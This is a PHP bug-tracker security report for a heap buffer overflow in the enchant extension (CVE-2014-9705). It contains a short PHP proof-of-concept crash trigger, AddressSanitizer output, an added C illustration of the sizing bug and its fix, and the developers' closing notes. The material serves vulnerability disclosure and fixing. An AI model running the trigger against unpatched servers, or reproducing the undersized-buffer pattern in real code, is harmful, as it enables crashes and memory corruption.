Sec Bug #68552 heap buffer overflow in enchant_broker_request_dict()
Submitted: 2014-12-05 13:15 UTC
Modified: 2015-03-18 12:11 UTC
From: advisory at htbridge dot ch
Assigned: tony2001
Status: Closed
Package: Reproducible crash
PHP Version: 5.6.3
OS: Ubuntu 14.04.1 LTS 32bit
Private report: No
CVE-ID: 2014-9705
 [2014-12-05 13:15 UTC] advisory at htbridge dot ch
Description:
------------
The following test case crashes php as it tries to read invalid memory.

The write heap overflow from ASAN is not always reproducible - you need to run the test case a couple of times to get it.

Also affects 64-bit systems.

PoC
========

<?php
$tag = 'en_US';
$r = enchant_broker_init();                  // broker that owns the list of requested dictionaries
$d = enchant_broker_request_dict($r, $tag);  // first request: the 4-byte block reported at enchant.c:554 is allocated here
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);  // same tag again: the write at enchant.c:571 overruns that block
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);  // third request on the corrupted heap: the crash in the trace below
?>


Result:
========
[Fri Dec  5 13:32:59 2014]  Script:  '/home/symeon/Desktop/dict.php'
---------------------------------------
/home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
Beginning:      OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
    Start:  OK
      End:  Overflown (magic=0x00000034 instead of 0xAF9A0F68)
            At least 4 bytes overflown
---------------------------------------
=================================================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
    #0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
    #4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
    #5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
    #6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
    #7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
    #8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
    #9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #10 0x807d080 in _start ??:?
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
    #0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
    #1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
    #2 0xb616ef1e in ?? ??:0
    #3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
    #4 0xb6184b7f in __asan_report_error ??:?
    #5 0xb617db2e in __asan_report_store4 ??:?
    #6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
    #7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
    #8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
    #9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
    #10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
    #11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
    #12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
    #13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
    #14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
    #15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287


Regards,
S. Paraschoudis
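The block status in the report (a 4-byte block allocated at enchant.c:554, i.e. one 32-bit pointer, overflown by a 4-byte write at enchant.c:571 when the same tag is requested again) fits a dictionary-pointer array grown by one slot too few. The C block below is an added illustration, not the PHP extension source or the committed fix, and every name in it is constructed: it contrasts that sizing with the corrected one and shows the bounded append a reviewer would ask for.

```c
#include <stdint.h>
#include <stdlib.h>

/* Constructed model of a broker holding a growable heap array of dictionary
 * handles; illustrative code, not the PHP extension source. The shape follows
 * the report's memory-manager output: a 4-byte block (one 32-bit pointer)
 * allocated at enchant.c:554 and overflown by a 4-byte write at enchant.c:571. */
typedef struct { const char *tag; } dict_t;
typedef struct {
    dict_t **dict;   /* heap array of dictionary pointers */
    size_t dictcnt;  /* slots in use */
} broker_t;

/* Slots provided by a grow that reallocates to the *current* count before
 * storing the new entry at index dictcnt: with one dictionary present it
 * yields a 1-slot block and then writes slot 1, one pointer past the end.
 * Kept as arithmetic so the defect can be checked without performing
 * the out-of-bounds write. */
size_t grow_slots_buggy(size_t dictcnt) { return dictcnt ? dictcnt : 1; }

/* Corrected sizing: always one slot more than are currently in use. */
size_t grow_slots_fixed(size_t dictcnt) { return dictcnt + 1; }

/* 1 if storing at index pos stays inside a block of `slots` entries. */
int store_in_bounds(size_t slots, size_t pos) { return pos < slots; }

/* Safe append: grows by exactly one slot, guards the size multiplication
 * and keeps the old array if realloc fails. Returns the new index or -1. */
int broker_add_dict(broker_t *b, dict_t *d) {
    size_t need = b->dictcnt + 1;
    if (need == 0 || need > SIZE_MAX / sizeof(dict_t *)) return -1;
    dict_t **grown = realloc(b->dict, need * sizeof(dict_t *));
    if (!grown) return -1;
    b->dict = grown;
    b->dict[b->dictcnt] = d;
    return (int)b->dictcnt++;
}

/* Mirrors the PoC: three requests for the same tag on one broker.
 * Returns the number of dictionaries held afterwards (3 with safe growth). */
int simulate_three_requests(void) {
    broker_t b = { NULL, 0 };
    dict_t d[3] = { {"en_US"}, {"en_US"}, {"en_US"} };
    for (int i = 0; i < 3; i++)
        if (broker_add_dict(&b, &d[i]) != i) { free(b.dict); return -1; }
    int held = (int)b.dictcnt;
    free(b.dict);
    return held;
}
```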




History

 [2014-12-19 09:27 UTC] advisory at htbridge dot ch
Did anyone have time to review and confirm the issue?
 [2015-01-26 10:19 UTC] advisory at htbridge dot ch
Friendly reminder, can someone please review it?
Thank you.
 [2015-01-26 11:50 UTC] tony2001@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: tony2001
 [2015-01-26 11:50 UTC] tony2001@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

Pushed a fix to SVN, thanks!
http://svn.php.net/viewvc/pecl/enchant/trunk/enchant.c?r1=317600&r2=335803
 [2015-03-18 12:11 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2014-9705
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sun Feb 26 14:01:37 2017 UTC